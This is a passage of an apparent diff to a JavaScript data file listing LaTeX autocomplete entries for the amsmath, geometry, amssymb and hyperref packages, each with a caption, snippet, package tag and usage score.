'\\do', + snippet: '\\do', + meta: 'amsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'amsmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'amsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'amsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'amsmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'amsmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'amsmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'amsmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'amsmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'amsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'amsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'amsmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'amsmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'amsmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'amsmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'amsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'amsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'amsmath-cmd', + score: 
0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'amsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'amsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'amsmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'amsmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'amsmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'amsmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'amsmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'amsmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'amsmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'amsmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'amsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'amsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'amsmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'amsmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'amsmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'amsmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'amsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'amsmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'amsmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'amsmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'amsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'amsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'amsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'amsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'amsmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'amsmath-cmd', + score: 
0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'amsmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'amsmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'amsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'amsmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'amsmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'amsmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'amsmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'amsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'amsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'amsmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'amsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'amsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'amsmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'amsmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'amsmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'amsmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'amsmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'amsmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'amsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'amsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'amsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'amsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'amsmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'amsmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'amsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'amsmath-cmd', + score: 
3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'amsmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'amsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'amsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'amsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'amsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'amsmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'amsmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'amsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'amsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'amsmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'amsmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'amsmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'amsmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'amsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'amsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'amsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'amsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'amsmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'amsmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'amsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'amsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'amsmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'amsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'amsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'amsmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'amsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'amsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + 
snippet: '\\arg', + meta: 'amsmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'amsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'amsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'amsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'amsmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'amsmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'amsmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'amsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'amsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'amsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'amsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'amsmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'amsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'amsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'amsmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'amsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'amsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'amsmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'amsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'amsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'amsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'amsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'amsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'amsmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'amsmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'amsmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'amsmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'amsmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'amsmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'amsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'amsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'amsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'amsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: 
'\\arcsin', + meta: 'amsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'amsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'amsmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'amsmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'amsmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'amsmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'amsmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'amsmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'amsmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsmath-cmd', + score: 0.0063276692758974925, + }, + ], + geometry: [ + { + caption: '\\savegeometry{}', + snippet: '\\savegeometry{$1}', + meta: 'geometry-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\loadgeometry{}', + snippet: '\\loadgeometry{$1}', + meta: 'geometry-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\newgeometry{}', + snippet: '\\newgeometry{$1}', + meta: 'geometry-cmd', + score: 0.0025977479207639352, + }, + { + caption: '\\geometry{}', + snippet: '\\geometry{$1}', + meta: 'geometry-cmd', + score: 0.046218420429973615, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'geometry-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\restoregeometry', + snippet: '\\restoregeometry', + meta: 'geometry-cmd', + score: 0.0007546303842143648, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'geometry-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'geometry-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'geometry-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'geometry-cmd', + score: 0.00021116765384691477, + }, + ], + amssymb: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'amssymb-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'amssymb-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'amssymb-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'amssymb-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'amssymb-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'amssymb-cmd', + score: 0.0006671850995492977, + }, + ], + hyperref: [ + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'hyperref-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + 
snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'hyperref-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'hyperref-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'hyperref-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'hyperref-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hyperref-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'hyperref-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'hyperref-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'hyperref-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'hyperref-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'hyperref-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'hyperref-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'hyperref-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'hyperref-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'hyperref-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'hyperref-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'hyperref-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'hyperref-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'hyperref-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + 
meta: 'hyperref-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'hyperref-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'hyperref-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'hyperref-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'hyperref-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'hyperref-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'hyperref-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'hyperref-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'hyperref-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'hyperref-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'hyperref-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'hyperref-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'hyperref-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'hyperref-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'hyperref-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'hyperref-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'hyperref-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'hyperref-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'hyperref-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'hyperref-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'hyperref-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'hyperref-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + 
snippet: '\\nolinkurl{$1}', + meta: 'hyperref-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'hyperref-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'hyperref-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'hyperref-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'hyperref-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'hyperref-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'hyperref-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + 